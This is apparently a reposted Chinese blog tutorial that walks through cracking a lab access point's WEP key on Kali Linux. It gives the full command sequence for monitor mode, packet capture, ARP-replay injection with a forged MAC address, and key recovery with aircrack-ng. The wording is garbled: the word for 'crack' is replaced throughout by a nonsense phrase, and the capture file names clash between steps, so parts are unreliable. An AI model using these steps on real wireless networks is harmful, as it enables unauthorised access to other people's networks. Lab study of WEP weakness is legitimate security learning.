kali WEP 激活成功教程

kali WEP 激活成功教程1 先登录 AP 在 WLAN 配置里将网络认证方式设置为 WEP 将密钥长度设置为 128bit 并将 16 进制值 qwer 设置为 128 位的 WEP 密钥 2 iwconfig 此命令用于检测网卡是否存在 如下图所示

1.先登录AP,在 WLAN 配置里将网络认证方式设置为 WEP。将密钥长度设置为 128bit 。并将16进制值 qwer 设置为 128 位的 WEP 密钥。                                                                     ace31d1852d7429cbe01376e676dff1a.png 

 

2. iwconfig         (此命令用于检测网卡是否存在)  。如下图所示。                                                   3. 在 kali 输入:  ifconfig  wlan0  up        (此命令用于激活网卡) 。如下图所示。                                4. airmon-ng  start  wlan0        (打开 kali无线网卡 监控模式) 。如下图所示。                                5. 在 kail 里输入:    airodump-ng  wlan0mon     (此命令用于扫描和嗅探周围无线网络信息)。如下图所示 。                                                       d3dc1bf34c2e4b01a3e490a65e17428f.png

 

6. 在 kali 输入: airodump-ng  –bssid  实验路由器MAC  –channel  10  –write WPACrackingDemo  wlan0mon      (此命用用于扫描哪些设备连接了实验路由器mac,并跟据实验路由器 信道  锁定kali 网卡信道,并将抓到的数据包存进 WPACrackingDemo-04.cap 里)。如下图图1所示。  

7. 让任意一台无线客户端连接 AP 会显示 无线客户端已连接AP 的画面,如图2所示。        3d65306b4ff74e4eaca8ea673d6aed66.png

 

8. 新开一个窗口并root。输入: ls    (用于查看转储流量的 WPACrackingDemo-04.cap 文件)          b1459041bbfd426180db2682ea8b1df4.png    

 9. 在 kali 输入: aireplay-ng  -3  -b  实验路由器MAC地址  -h   伪造的MAC地址  wlan0mon            (此命令用于生成大量以相同密钥加密的数据包,抓取无线网络中的ARP数据包,再将其回灌网络来模拟ARP响应)。          c                                                                                                                    6baecf720fb7472babefdaaebcdc89bb.png

 

 10. 在kali 输入: aircrack-ng   -w /usr/share/wordlists/nmap.lst  WEPCrackingDemo-04.cap            (此命令用于以抓到的大量响应包来破WEP密钥,-w 后面是用于激活成功教程密码的 字典路径)。               激活成功教程结果如下图。 (紫色下划线部份是激活成功教程的密钥, 红色下划线部份是激活成功教程的密码)。                                                                                                                               bc2b5e9c8760447393dab8164e3e3f53.png

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/198782.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月26日 下午2:29
下一篇 2026年3月26日 下午2:29


相关推荐

  • rpm安装gcc

    rpm安装gcc使用原始安装介质,操作系统为RedHatEnterpriseLinuxServerrelease7.4(Maipo)rpm-ivh\gcc-4.8.5-16.el7.x86_64.rpm\cpp-4.8.5-16.el7.x86_64.rpm\glibc-devel-2.17-196.el7.x86_64.rpm\…

    2022年6月12日
    37
  • JAVA 内存泄露详解(原因、例子及解决)

    JAVA 内存泄露详解(原因、例子及解决)转载请注明出处 http blog csdn net anxpp article details 谢谢 Java 的一个重要特性就是通过垃圾收集器 GC 自动管理内存的回收 而不需要程序员自己来释放内存 理论上 Java 中所有不会再被利用的对象所占用的内存 都可以被 GC 回收 但是 Java 也存在内存泄露 但它的表现与 C 不同 JAVA 中的内存管

    2026年3月19日
    2
  • Linux 软中断机制分析

    Linux 软中断机制分析软中断分析 nbsp nbsp 最近工作繁忙 没有时间总结内核相关的一些东西 上次更新博客到了 linux 内核中断子系统 这次总结一下软中断 也就是 softirq 之后还会总结一些 tasklet 工作队列机制 1 nbsp 为什么要软中断 nbsp nbsp 编写驱动的时候 一个中断产生之后 内核在中断处理函数中可能需要完成很多工作 但是中断处理函数的处理是关闭了中断的 也就是说在响应中断时 系统不能再次响应外部的其它中断

    2026年3月17日
    1
  • RESTFul API 接口文档模板

    RESTFul API 接口文档模板修订记录发布日期修改说明 2019 01 01 第一次发布说明排版约定排版格式含义 lt gt 变量 可选项 必选项 互斥关系等宽字体 CourierNew 屏幕输出编码若请求消息体中的参数支持中文 则中文字符必须为 UTF 8 编码 时间与日期日期与时间的表示有多种方式 为统一起见 除非是约定俗

    2026年3月18日
    3
  • hibernate 大对象类型hibernate制图

    hibernate 大对象类型hibernate制图

    2021年12月17日
    43
  • Odin Inspector 系列教程 — Dictionary Drawer Settings Attribute[通俗易懂]

    Odin Inspector 系列教程 — Dictionary Drawer Settings Attribute[通俗易懂]DictionaryDrawerSettings自定义字典绘制方式默认以左侧为key,右侧为value的形式展示,如果需要进行序列化,需要继承自SerializedMonoBehaviour[DictionaryDrawerSettings()][ShowInInspector][InfoBox(“为了序列化字典,我们需要做…

    2022年7月21日
    19

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号